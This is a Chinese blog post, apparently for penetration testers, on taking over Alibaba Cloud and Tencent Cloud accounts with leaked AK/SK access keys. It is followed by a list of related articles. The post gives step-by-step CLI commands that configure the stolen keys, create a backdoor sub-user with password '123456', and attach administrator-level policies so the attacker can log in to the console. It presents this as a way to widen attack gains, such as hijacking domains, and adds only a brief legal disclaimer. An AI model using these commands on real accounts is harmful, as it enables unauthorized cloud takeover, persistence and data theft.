如何通过ak,sk登录云平台

于 2024-07-24 16:27:08 发布
阅读量140 收藏 4
点赞数 2
文章标签: windows 经验分享 linux web安全 漏洞挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/140659073
版权

如何通过ak,sk登录云平台

在云计算中,AK(Access Key)和SK(Secret Key)通常用于进行 API 调用,以便访问和管理云服务资源。这些密钥对于安全性至关重要,因为它们允许对云资源执行各种操作。如果泄露或不当使用,可能会导致严重的安全风险和数据泄露。
而在实战中,大部分文章基本是什么工具一把嗦嗦哈,看oss,rds,ecs,其实如果ak,sk权限过大,是可以创建子用户来登录云管的,说不定登进去就能接管域名,im服务等扩大攻防成果。

下面介绍腾讯云,阿里云的接管方式,其他云大差不差,看官方文档就能搞

阿里云

阿里云有一个ram账号,可以看看他的官方介绍

图片

RAM用户由阿里云账号(主账号)或具有管理员权限的其他RAM用户,同时ram账号可以用ak,sk进行调用api创建
根据阿里云官方的命令行工具https://github.com/aliyun/aliyun-cli/blob/master/README-CN.md

配置 ak sk

./aliyun configure --profile akprofile

图片

创建ram账号

查看别名
./aliyun ram GetAccountAlias
常见账号
./aliyun aliyun ram CreateUser --UserName SxfnbQaxsb2333
设置密码
./aliyun ram CreateLoginProfile --UserName SxfnbQaxsb2333 --Password 123456
设置权限
./aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName SxfnbQax**2333

创建好账号后,查看该云的别名

./aliyun ram GetAccountAlias 获取id放在域名后面

图片

登录账号为
创建的用户@+别名+.onaliyun.com
然后就可以用这个账号正常登录阿里云,和你自己账号登录阿里云一样

图片

腾讯云

腾讯云也一样,只不过叫法不同,腾讯云叫子用户,与阿里云不同的是,腾讯云登录子用户需要主账号id才可以

图片

我们下载其官方命令行工具https://github.com/TencentCloud/tencentcloud-cli

查看命令行命令

获取主用户id
tccli cam GetUserAppId --cli-unfold-argument

图片

图片

创建子用户
tccli cam AddUser –cli-unfold-argument --Name Sxfnb2333 --Remark sxf --ConsoleLogin 1 --Password '123456' --NeedResetPassword 0
查询策略
tccli cam ListPolicies --cli-unfold-argument
给最高权限
tccli cam AttachUserPolicy --cli-unfold-argument --PolicyId 1 --AttachUin 100035117703
列出子用户
tccli cam ListUsers --cli-unfold-argument

创建好后然后去登录

图片

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

更多网络安全优质免费学习资料与干货教程加v

送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。

                         

黑客大佬
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞挖掘】——64、云主机AK/SK泄露利用
Fly_鹏程万里
06-11 137
云主机通过使用Access Key Id/Secret Access Key加密的方法来验证某个请求的发送者身份,其中Access Key ID(AK)用于标示用户,Secret Access Key(SK)是用户用于加密认证字符串和云厂商用来验证认证字符串的密钥,其中SK必须保密,原理为对称加解密,云主机接收到用户的请求后系统将使用AK对应的相同的SK和同样的认证机制生成认证字符串并与用户请求中包含的认证字符串进行比对,如果认证字符串相同,系统认为用户拥有指定的操作权限并执行相关操作,如果不同则系统将忽略
AK/SK认证方式
weixin_45630387的博客
05-28 1131
AK/SK认证
云主机AK/SK泄露挖掘
weixin_44217321的博客
01-22 943
AK/SK(Access Key ID/Secret Access Key)即访问密钥,包含访问密钥ID(AK)和秘密访问密钥(SK)两部分,公有云通过AK识别用户的身份,通过SK对请求数据进行签名验证,用于确保请求的机密性、完整性和请求者身份的正确性。简单来说,云AK/SK是用于生成用户跟云平台的API通信的访问凭据。其中SK是必须要保密的,不能通过任何途径泄露,否则就会产生安全问题。
aksk怎么认证 海康威视_公有云API的认证方式:AK/SK 简介
weixin_39855843的博客
12-20 788
1 公有云API的认证方式一般有一夏几种认证方式:Token认证AK/SK认证RSA非对称加密方式下面主要介绍AK/SK1 AK/SK1.1 AK/SK 原理云主机需要通过使用Access Key Id / Secret Access Key加密的方法来验证某个请求的发送者身份。Access Key Id(AK)用于标示用户,Secret Access Key(SK)是用户用于加密认证字符串和云厂...
阿里云ak/sk漏洞利用工具
06-27
其核心功能是提供一个方便的平台,通过输入有效的AK/SK,执行针对阿里云服务的系统命令,如对象存储服务(OSS)的操作。 以下是一些相关的知识点: 1. **AK/SK管理**:理解AK/SK的生成、存储和管理原则至关重要。...
百度AK的申请流程
12-16
在使用百度地图服务时,我们需要获取一个称为AK(Access Key)的凭证,这是百度LBS开放平台识别开发者应用的关键。AK是全局唯一的,它与开发者之间建立多对一的映射关系,每个开发者可以拥有最多20个AK。在请求任何...
阿里云 AKSK 命令执行到谷歌验证码劫持1
08-03
前言去年的一次任务,当时搞的挺费劲的,是一个不断踩坑填坑的快乐经历,过程过于有趣就大概记录了一下,不过由于时间挺久了,当时也没有记录太多东西导致零零散散的很不全
Sangfor SCP平台开放API接口
08-26
申请AK/SK(Access Key和Secret Key)目前需要通过SCP的技术支持后台生成,未来版本会提供网页管理。签名工具类是必需的,用来为每个请求生成签名信息,Sangfor提供了Python和Java两种语言的示例代码。 9. **请求...
百度云存储.rar
07-29
要开始使用百度云存储服务,首先需要在百度开放平台注册开发者账号,创建一个应用并获取到API密钥(AK)和安全密钥(SK)。这些密钥用于验证请求的身份,确保只有授权的用户才能访问存储的数据。 在 Delphi 中,...
编写一款2D CAD/CAM软件(二十一)生产ASCII ART Logo
Arthur...J的博客
07-20 771
发挥你的想象力、艺术创造力,在各种位图编辑软件中生产软件Logo的位图,例如位图名称为logo.png.然后打开ascii.txt文件,查看根据位图生成的ASCII ART Logo.利用QCommandLineParser来显示ASCII ART Logo.1) 安装jp2a工具:sudo apt install jp2a。
FastAPI 学习之路(五十九)封装统一的json返回处理工具
mr~li的博客
07-18 436
在本篇文章之前的接口,我们每个接口异常返回的数据格式都不一样,处理起来也没有那么方便,因此我们可以封装一个统一的json。改造后,我们的返回消息,可以自定义code,message,data。接下来我们再次改造下我们的新建用户的接口。把代码统一放到common下面的json_tools.py里面,我们在接口返回的时候调用。这样我们就完成了统一接口响应处理,后续我们可以在所有的接口中使用。我们看下修改后的用户返回。我们看下处理后的效果。我们看创建重复的返回。
vant IndexBar 索引不跟随页面滚动,IndexBar城市选择组件
qq_35430000的博客
07-20 208
vant 城市选择组件
python中的fire和Linux shell中的参数传递
Richardlygo的博客
07-20 782
Hi, John!
路由数据获取及封装方法
qq_42899641的博客
07-18 329
【代码】路由数据获取及封装方法。
jdk1.8 List集合Stream流式处理
Yuhei001的博客
07-20 856
Java 8 引入了一个新的抽象层——Stream API,它允许你以声明性方式处理数据集合(包括数组、集合等)。Stream API 提供了一种高效且易于表达的方式来处理数据集合,包括过滤、排序、映射和归约等操作。这种处理方式极大地提高了代码的可读性和可维护性,同时也提升了处理大量数据的性能。Stream(流)是 Java 8 引入的一个关键抽象概念,它代表了一个来自数据源的元素队列并支持聚合操作。
Linux文件和目录常用命令
loongnoy的博客
07-19 426
可以理解为现实生活中的管子,管子的一头塞东西进去,另一头取出来,这里 | 的左右分为俩端,左端塞东西(写),右端取东西(读)ls 是英文单词 list 的简写,其功能为列出目录的内容,是用户最常用的命令之一,类似于 DOs 下的dir 命令。-r 若给出的源文件是目录文件,则cp将递归复制该目录下的所有子目录和文件,目标文件必须为一个目录名。·cp 命令的功能是将给出的文件或目录复制到另一个文件或目录中,相当于DOS下的copy命令。的简写,其功能为更改当前的工作目录,也是用户最常用的命令之一。
c++网络编程实战——开发基于ftp协议的文件传输模块(二) 配置ftp服务与手动执行ftp命令
qq_73924465的博客
07-19 893
在上一篇文章中我们提到过ftp的传输模式有主动/被动传输两种模式,而一般情况下我们默认是被动模式,这里我们的介绍也以被动模式为主。
学习记录day16—— 数据结构 双向链表 循环链表
最新发布
weixin_64918301的博客
07-22 394
1)就是从任意一个节点既能存储其前驱节点,又能存储后继节点2)结构体中增加一个指向前驱节点的指针3)头节点没有前驱,最后一个节点没有后继。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值